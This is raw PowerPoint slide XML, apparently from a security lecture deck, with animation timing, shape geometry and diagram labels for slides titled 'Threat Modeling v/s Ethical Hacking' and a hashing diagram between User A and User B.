                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="834"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="834"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="64" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="65" presetClass="exit" nodeType="afterEffect" presetSubtype="4" presetID="2" grpId="13" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="826"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="826"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="68" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="82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28" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="830" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="830" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="829" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="829" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="832" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="834" grpId="12"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="831" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="831" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="833" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="826" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="827" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="827" grpId="2"/>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5" name="Threat Modeling…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t>Threat Modeling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t>v/s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="514095">
              <a:defRPr sz="7040"/>
            </a:pPr>
            <a:r>
              <a:t> Ethical Hacking</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840" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6502400" y="1980070"/>
            <a:ext cx="5624125" cy="6159219"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5624124" cy="6159217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="838" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5624125" cy="6159218"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F0F1E1"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="839" name="User B"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="68739" y="68739"/>
              <a:ext cx="5486647"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lgn="r" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>User B</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="843" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="666044" y="1980070"/>
            <a:ext cx="5563166" cy="6159219"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5563164" cy="6159217"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="841" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5563165" cy="6159218"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEE7F1"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="842" name="User A"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="67994" y="67995"/>
              <a:ext cx="5427177"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lgn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>User A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="844" name="User_UserHalfD01" descr="User_UserHalfD01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="923430" y="2537742"/>
            <a:ext cx="731521" cy="1151467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="845" name="User_UserHalfE01" descr="User_UserHalfE01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11112782" y="2537742"/>
            <a:ext cx="731521" cy="1151467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="850" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2551288" y="2501617"/>
            <a:ext cx="1108570" cy="1792677"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1108568" cy="1792675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="846" name="Document_Writing01" descr="Document_Writing01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1108569" cy="1792676"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="849" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="82488" y="762474"/>
              <a:ext cx="895307" cy="472949"/>
              <a:chOff x="0" y="18203"/>
              <a:chExt cx="895305" cy="472947"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="847" name="Oval"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="28329"/>
                <a:ext cx="895306" cy="452697"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="74900"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="487680" indent="-487680" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="848" name="Data"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="112331" y="18203"/>
                <a:ext cx="670643"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marL="487680" indent="-487680" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>Data</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="851" name="Policy_Writing01" descr="Policy_Writing01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2702559" y="6470791"/>
            <a:ext cx="792481" cy="1056641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="852" name="Hash Value"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3457316" y="7121624"/>
            <a:ext cx="1416568" cy="472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nchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hash Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="853" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4294563">
            <a:off x="2300675" y="4671342"/>
            <a:ext cx="3117992" cy="11627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07" y="13442"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20448" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20355" y="12343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20276" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20077" y="11314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19865" y="10605"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19640" y="10002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="9328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19137" y="8690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="8087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18581" y="7484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18302" y="6916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17640" y="5781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17322" y="5249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="4753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16594" y="4292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16223" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15826" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15415" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="2589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14594" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14170" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13733" y="1561"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13270" y="1312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="1029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12343" y="780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11866" y="638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11389" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10913" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409" y="177"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10158" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9390" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8886" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8237" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7906" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7588" y="106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6953" y="284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6344" y="426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6026" y="567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5721" y="674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5125" y="958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4556" y="1241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3973" y="1596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417" y="2022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887" y="2483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2344" y="3015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1841" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351" y="4079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887" y="4646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="424" y="5320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411" y="5462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="834" y="5001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1258" y="4575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1695" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2159" y="3760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2384" y="3618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2609" y="3405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3072" y="3086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3576" y="2837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4052" y="2518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4569" y="2341"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5072" y="2128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5589" y="1986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6132" y="1880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6661" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7204" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7734" y="1667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8264" y="1702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8754" y="1773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9257" y="1809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9734" y="1915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10237" y="2057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10701" y="2234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11177" y="2447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11641" y="2625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12542" y="3192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12979" y="3511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13402" y="3831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13826" y="4185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14223" y="4540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14634" y="4966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15018" y="5427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15376" y="5817"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15746" y="6278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16104" y="6810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16435" y="7306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766" y="7838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17084" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17667" y="9541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="10747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18435" y="11421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="12059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18872" y="12698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19071" y="13442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19243" y="14116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19415" y="14826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19031" y="14967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18660" y="15145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21176" y="11988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20607" y="13442"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="854" name="ServerProcess01" descr="ServerProcess01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3287324" y="4368800"/>
            <a:ext cx="1352410" cy="1038578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="Hash Algorithm"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4577905" y="4701285"/>
            <a:ext cx="2020190" cy="4729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lgn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hash Algorithm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="860" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7660640" y="5854417"/>
            <a:ext cx="1108570" cy="1792677"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1108568" cy="1792675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="856" name="Document_Writing01" descr="Document_Writing01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1108569" cy="1792676"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="859" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="82488" y="762474"/>
              <a:ext cx="895307" cy="472949"/>
              <a:chOff x="0" y="18203"/>
              <a:chExt cx="895305" cy="472947"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="857" name="Oval"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="28329"/>
                <a:ext cx="895306" cy="452697"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="74900"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
